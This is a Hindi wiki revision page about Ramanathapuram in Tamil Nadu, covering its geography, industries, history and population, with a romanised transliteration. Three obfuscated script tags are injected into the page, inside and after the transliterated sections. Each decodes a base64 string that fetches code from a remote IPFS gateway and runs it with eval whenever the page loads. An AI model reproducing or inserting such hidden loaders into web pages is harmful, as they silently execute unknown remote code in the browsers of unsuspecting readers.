Difference between revisions of "रामनाथपुरम"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''रामनाथपुरम''' तमिलनाडु राज्य, दक्षिण भारत में स्...' के साथ नया पन्ना बनाया)
 
Line 1: Line 1:
 +
[[चित्र:Ramalinga-Vilasam-Palace-Ramanathapuram.jpg|thumb|250px|रामालिंगा विलासम महल, रामनाथपुरम]]
 
'''रामनाथपुरम''' [[तमिलनाडु]] राज्य, [[दक्षिण भारत]] में स्थित एक नगर और ज़िला है। कभी मारवन राजाओं की राजधानी रहे इस नगर में वस्त्रों और [[आभूषण|आभूषणों]] का उत्पादन होता है। यहाँ के काँलेज मदुरै-कामराज विश्वविधालय से समद्ध हैं, जिनमें 'सैयद अम्माल इंजीनियरिंग कॉलेज', 'एम. साथक इंजीनियरिंग कॉलेज', 'सेतुपति गवर्नमेंट आर्ट्स कॉलेज' और 'ईदय्यम विमंस कॉलेज' शामिल हैं। इसका नाम [[हिन्दू]] [[देवता]] [[श्रीराम]] की ओर इंगित करता है।
 
'''रामनाथपुरम''' [[तमिलनाडु]] राज्य, [[दक्षिण भारत]] में स्थित एक नगर और ज़िला है। कभी मारवन राजाओं की राजधानी रहे इस नगर में वस्त्रों और [[आभूषण|आभूषणों]] का उत्पादन होता है। यहाँ के काँलेज मदुरै-कामराज विश्वविधालय से समद्ध हैं, जिनमें 'सैयद अम्माल इंजीनियरिंग कॉलेज', 'एम. साथक इंजीनियरिंग कॉलेज', 'सेतुपति गवर्नमेंट आर्ट्स कॉलेज' और 'ईदय्यम विमंस कॉलेज' शामिल हैं। इसका नाम [[हिन्दू]] [[देवता]] [[श्रीराम]] की ओर इंगित करता है।
{{tocright}}
 
 
==भौगोलिक तथ्य==
 
==भौगोलिक तथ्य==
 
रामनाथपुरम ज़िले का क्षेत्रफल 12,578 वर्ग कि.मी. है और इसमें 'रामेश्ववरम द्धीप' समेत दक्षिणी समुद्र तटीय मैदान का एक समतल भू-भाग शामिल है। दक्षिण-पश्चिमी मानसून को पश्चिम की ओर पश्चिमी घाट और दक्षिण-पूर्व की ओर [[श्रीलंका]] के पहाड़ पूर्वोत्तर और दक्षिम-पश्चिमी मॉनसून को रोकते हैं, जिससे असामान्य तौर पर यहाँ की जलवायु शुष्क रहती है। लेकिन सिंचाई जलाशय ([[मिट्टी]] के पुश्तों या किनारों वाले तालाब में जमा पानी) इस ज़िले को [[मिर्च]] और [[कपास]] का निर्यात करने में समर्थ बनाते हैं। सूती वस्त्र और सीमेंट की मिल, जैसे बड़े पैमाने के उद्योगों का प्रवेश इसके नगरों में हुआ है। जिसमें सबसे बड़ी मिलें राजपालैयम, विरुदुनगर और कल्लिकुडी में हैं। [[भारत]] में बनने वाले 90 प्रतिशत पटाखे शिवकाशी में बनते हैं।
 
रामनाथपुरम ज़िले का क्षेत्रफल 12,578 वर्ग कि.मी. है और इसमें 'रामेश्ववरम द्धीप' समेत दक्षिणी समुद्र तटीय मैदान का एक समतल भू-भाग शामिल है। दक्षिण-पश्चिमी मानसून को पश्चिम की ओर पश्चिमी घाट और दक्षिण-पूर्व की ओर [[श्रीलंका]] के पहाड़ पूर्वोत्तर और दक्षिम-पश्चिमी मॉनसून को रोकते हैं, जिससे असामान्य तौर पर यहाँ की जलवायु शुष्क रहती है। लेकिन सिंचाई जलाशय ([[मिट्टी]] के पुश्तों या किनारों वाले तालाब में जमा पानी) इस ज़िले को [[मिर्च]] और [[कपास]] का निर्यात करने में समर्थ बनाते हैं। सूती वस्त्र और सीमेंट की मिल, जैसे बड़े पैमाने के उद्योगों का प्रवेश इसके नगरों में हुआ है। जिसमें सबसे बड़ी मिलें राजपालैयम, विरुदुनगर और कल्लिकुडी में हैं। [[भारत]] में बनने वाले 90 प्रतिशत पटाखे शिवकाशी में बनते हैं।
Line 16: Line 16:
 
[[Category:तमिलनाडु]][[Category:तमिलनाडु के नगर]][[Category:भारत के नगर]][[Category:तमिलनाडु के पर्यटन स्थल]][[Category:पर्यटन कोश]][[Category:ऐतिहासिक स्थान कोश]]
 
[[Category:तमिलनाडु]][[Category:तमिलनाडु के नगर]][[Category:भारत के नगर]][[Category:तमिलनाडु के पर्यटन स्थल]][[Category:पर्यटन कोश]][[Category:ऐतिहासिक स्थान कोश]]
 
__INDEX__
 
__INDEX__
 +
__NOTOC__

Revision as of 17:57, 26 September 2012

thumb|250px|ramalianga vilasam mahal, ramanathapuram ramanathapuram tamilanadu rajy, dakshin bharat mean sthit ek nagar aur zila hai. kabhi maravan rajaoan ki rajadhani rahe is nagar mean vastroan aur abhooshanoan ka utpadan hota hai. yahaan ke kaanlej madurai-kamaraj vishvavidhalay se samaddh haian, jinamean 'saiyad ammal ianjiniyariang k aaulej', 'em. sathak ianjiniyariang k aaulej', 'setupati gavarnameant arts k aaulej' aur 'eedayyam vimans k aaulej' shamil haian. isaka nam hindoo devata shriram ki or iangit karata hai.

bhaugolik tathy

ramanathapuram zile ka kshetraphal 12,578 varg ki.mi. hai aur isamean 'rameshvavaram ddhip' samet dakshini samudr tatiy maidan ka ek samatal bhoo-bhag shamil hai. dakshin-pashchimi manasoon ko pashchim ki or pashchimi ghat aur dakshin-poorv ki or shrilanka ke paha d poorvottar aur dakshim-pashchimi m aaunasoon ko rokate haian, jisase asamany taur par yahaan ki jalavayu shushk rahati hai. lekin sianchaee jalashay (mitti ke pushtoan ya kinaroan vale talab mean jama pani) is zile ko mirch aur kapas ka niryat karane mean samarth banate haian. sooti vastr aur simeant ki mil, jaise b de paimane ke udyogoan ka pravesh isake nagaroan mean hua hai. jisamean sabase b di milean rajapalaiyam, virudunagar aur kallikudi mean haian. bharat mean banane vale 90 pratishat patakhe shivakashi mean banate haian.

parivahan

apane samooche itihas ke dauran ramanathapuram zila svatantr bana raha aur 17vian tatha 18vian shatabdiyoan mean maravan rajaoan ne aksar tanjavur (bhatapoorv tanjaur) par akraman kie. british sarakar ne rameshvaram se hokar 'silon' (vartaman shrilanka) ke lie ek rel aur nau-parivahan pranali sthapit ki thi. madurai zile mean madurai se s dakean uttar ki or phaili huee haian.

janasankhya

is nagar ki janasankhya san 2001 ke anusar, nagar mean 61,976 aur zile mean kul 11,83,321 hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>